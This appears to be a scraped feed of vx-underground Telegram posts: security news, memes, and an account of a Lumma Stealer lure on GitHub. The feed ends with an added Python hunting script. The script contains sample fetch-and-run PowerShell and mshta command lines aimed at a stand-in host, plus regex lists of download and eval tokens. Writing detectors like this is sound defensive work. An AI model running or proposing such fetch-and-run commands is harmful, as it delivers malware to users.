vxunderground | Unsorted

Telegram channel vxunderground - vx-underground

The largest collection of malware source, samples, and papers on the internet. Password: infected Website: https://www.vx-underground.org/ vx-underground Telegram chatroom link: https://t.me/+njfLzUrqos01ZWNh


vx-underground

The source code to Winamp was not leaked online. It was a scheduled release in hopes of furthering collaboration with others.

May 16th, 2024 they announced it would go open source on September 24th, 2024.

https://about.winamp.com/press/article/winamp-open-source-code


vx-underground

The domain for Ultra AV, the product Kaspersky installed on end-users' machines, was created July 16th, 2024. It is 70 days old.

https://ultrasecureav.com/


vx-underground

Kaspersky antivirus has reportedly begun silently installing a new antivirus product called "Ultra AV" on United States-based users' machines.

tl;dr


vx-underground

We aren't surprised, we're surprised it took this long. Pavel Durov is a citizen of France, a NATO country.


vx-underground

Today X shared they will be changing the way blocking accounts works. If you're blocked, you can still see the blocked person's and/or company's public posts. However, you can't engage with them and they can't engage with you.

We don't understand it, but whatever, what do we know?


vx-underground

Visual Studio 1874 (Professional Edition)


vx-underground

They have a dedicated team of over 100 professionals with over 12 years of experience.

In other words, they have 100 programmers each with roughly 44 days of PHP programming experience.


vx-underground

"Why doesn't this work?"

A better question sometimes asked is, "How does this even work?"


vx-underground

Also, shoutout to this girl for being fiercely loyal to her boyfriend (or girlfriend). There are a lot of people who would sell their soul for these expensive gifts.


vx-underground

Unrelated to malware of course, but this is relevant due to Twitter being our primary method of communicating updates and shitposts.


vx-underground

Appreciation post time.

There are a lot of security researchers who have an entire career focused on tracking botnets, or information stealers, and do so for years with little to no recognition. We'd like to take a minute to shoutout a few people who we think are doing great stuff and not getting enough love and respect.

- malwrhunterteam, consistently for years tracking malware, initial access malware, and openly sharing information on it

- Max_Mal_, Cryptolaemus1 (and whoever is part of the group), JAMESWT_MHT, and 1ZRR4H, for ruthlessly tracking many of the big-name botnets and loaders and openly sharing information on them

- JaffaCakes118 and Neiki__, who are both among the largest malware collectors and distributors. They've freely shared millions of malware samples for years.

- At-Gootloader, actively tracking Gootloader, the initial access malware used by many ransomware groups, and doing so, for free, for literally years.

- bmmaloney97, the number one expert in Windows OneDrive analysis and internals. He has openly and freely shared his research for years.

- RussianPanda9xx, for actively tracking Lumma Stealer (and tons of others), for what feels like forever, and openly sharing information and updates on the malware.

There are so many more we could shoutout, but we can't think of any more off the top of our head. But your work is respected and remembered. Thank you so much for the things you do for the researchers and the world.


vx-underground

Following the arrest of Malone Iam, for his alleged theft of $243,000,000, the cryptodrainer community has shown support for Malone Iam by having videos produced requesting his freedom.

They got shirts made really fast.


vx-underground

ZachXBT continues to prove himself as a world leading expert in crypto analysis. It is remarkable how a single person can make such a profound impact.

He gave law enforcement everything they needed on a silver plate. He got them busted in less than 2 months.

tl;dr speedrun

Attached PDF is from Twitter. It is how he got 2 crypto thieves arrested for stealing $243,000,000.


vx-underground

RansomHub ransomware group claims to have ransomed Liberty First Credit Union.

Liberty First Credit Union is a small to medium sized credit union (not-for-profit bank) located in Omaha, Nebraska.


vx-underground

Oh and pagers and walkie talkies exploding. This does not fall into the realm of malware, or news we would typically discuss, but there is a high volume of people who believe this to be malware.

It's not malware. They snuck explosives into the devices.

Have a nice day.


vx-underground

"Ultra AV, who is this?"


vx-underground

We used to receive emails and DMs asking for the password.

It has evolved. We now receive emails and DMs on how to become a hacker.

We're a library. Do you go to your local library and ask the librarian how to read?

Also, we almost exclusively cover malware. Wrong library pal


vx-underground

we're not The New York Times or The AP.

we're just a bunch of internet degenerates trying to make it ok sorry


vx-underground

In light of the recent arrest of Pavel Durov, CEO of Telegram, Telegram has made it crystal clear they will now fully cooperate with law enforcement agencies in seemingly any capacity.


vx-underground

Polish nerds seeing this right before their Monday starts: "Our government still uses them"


vx-underground

We're taking the day off.

Some updates on what's cookin':

- Improvements to VXDB
- MalwareIngestion daily dumps are coming back
- More malware families
- More malware papers
- New stuff for Black Mass Volume III.
- Probably more memes, depends on mood

See ya Monday ♥️


vx-underground

Note: we've learned that the woman he had a crush on is a model and comes from an affluent background. She has a strong and lengthy portfolio doing professional modeling with large and well known brands.

She owns her own Lamborghini.


vx-underground

Sometimes you have to stare at your code, scrolling up and down, top to bottom, and take time to admire your own work and be proud.

and sometimes you just stare at your code and say, "what the fuck is this piece of shit".


vx-underground

Following the recent arrests as a result of the research conducted by ZachXBT, some photos have been circulating of one of the alleged thieves responsible for the theft of $243,000,000.

In one of the photos Greavys a/k/a Malone Iam purchased a pink Lamborghini Urus, valued at roughly $241,843, and 3 Birkin Bags, valued at an estimated $63,000, for a girl he seemed to have a crush on.

She replied, "I am taken once again". She didn't even say "Thank you". 😭😭😭😭


vx-underground

Today the United States Securities and Exchange Commission announced they're seeking to sanction Elon Musk for failing to appear to court for a probe into his acquisition of Twitter.

Previously, Musk was scheduled for May 31st, 2024, on which he failed to appear in court. The SEC then rescheduled the hearing to September 20th, 2024 — he failed to appear in court again; instead he was in Florida attending the SpaceX launch of Polaris Dawn.

SEC lawyers accused Musk of 'gamesmanship', stating it would not be tolerated. Musk's lawyers said sanctions are excessive and instead request his court appearance be rescheduled to October 3rd.

More information: https://www.reuters.com/technology/us-sec-intends-seek-sanctions-against-elon-musk-twitter-probe-2024-09-20/


vx-underground

wtf are yall doing chill


vx-underground

There is an interesting psychological phenomenon where some Threat Actors, particularly scammers and fraudsters, falsely believe having money will make them respectable or make people like them.

Money means nothing. Materialism does not impress people — only the shallow.


vx-underground

There is no information on the impact to customers. We don't believe clients' money is gone — this isn't an attack against SWIFT. We presume this to be an attack against the institution's internal financial documents and employees.

However, we could also be completely wrong.


vx-underground

> OMG John Hammond's proof-of-concept trick is being used by Lumma stealer!!!

Us, with a giant library of malware source code and malware builders:


vx-underground

Crazy Thursday.

- Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr. Web reports having resolved the issue and has returned to normal day-to-day operations. No Threat Actor has been attributed to the compromise. They believe the compromise occurred on or around September 14th.

- Yesterday, or sometime before, GitHub users were targeted en masse by a large-scale phishing and/or malware campaign. An unknown Threat Actor(s) pushed their Lumma Stealer campaign by leaving bogus issues on GitHub projects. When the project owner visited the issue, the issue linked to a domain titled 'GitHub-Scanner'. GitHub-Scanner requested the visitor prove their humanity (e.g. not a robot) by doing Windows + R and CTRL + V + ENTER. When the site is visited, the website copies malicious code to the user's clipboard. Windows + R opens Windows Run, CTRL + V pastes the malicious code into the Run window, and ENTER runs it; this tricks the user into executing their malware payload. Once the payload is executed, it downloads a file called 'IE6.exe'. IE6.exe is Lumma information stealer. While it is a clever trick, the Threat Actor(s) (intentionally, or unintentionally) did not account for users who are not running Windows. This caused confusion for non-Windows users, or users on mobile devices.

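One way a defender can hunt for the Run-dialog trick described in that post, as an added example that is not the channel's own code: anything typed into Windows + R is spawned by explorer.exe, so process-creation telemetry where explorer.exe launches a script interpreter whose command line fetches or evaluates remote content is a useful triage filter. The event records, field names and the `example.invalid` URLs below are constructed for the demo, not taken from the campaign.

```python
import re

# Constructed Sysmon-style process-creation records (assumed field layout
# after a log pipeline flattens Event ID 1); not real campaign telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/x | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/page"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Program Files\vscode\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
]

# Interpreters and LOLBins commonly pasted into the Run dialog by such lures.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line tokens that indicate a remote fetch or in-memory evaluation.
NETWORK_HINTS = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|"
    r"invoke-expression|\biex\b|urlcache", re.I)


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_run_dialog_fetch(event):
    """True when explorer.exe spawns an interpreter that pulls remote content."""
    if basename(event["parent"]) != "explorer.exe":
        return False
    if basename(event["image"]) not in INTERPRETERS:
        return False
    return bool(NETWORK_HINTS.search(event["cmdline"]))


def triage(events):
    """Return the command lines of events matching the Run-dialog pattern."""
    return [e["cmdline"] for e in events if is_run_dialog_fetch(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("suspect Run-dialog launch:", hit)
```

explorer.exe is also the parent of anything started from the Start menu or a desktop shortcut, so this filter is a hunting starting point that still needs the interpreter and network-hint conditions to keep false positives down.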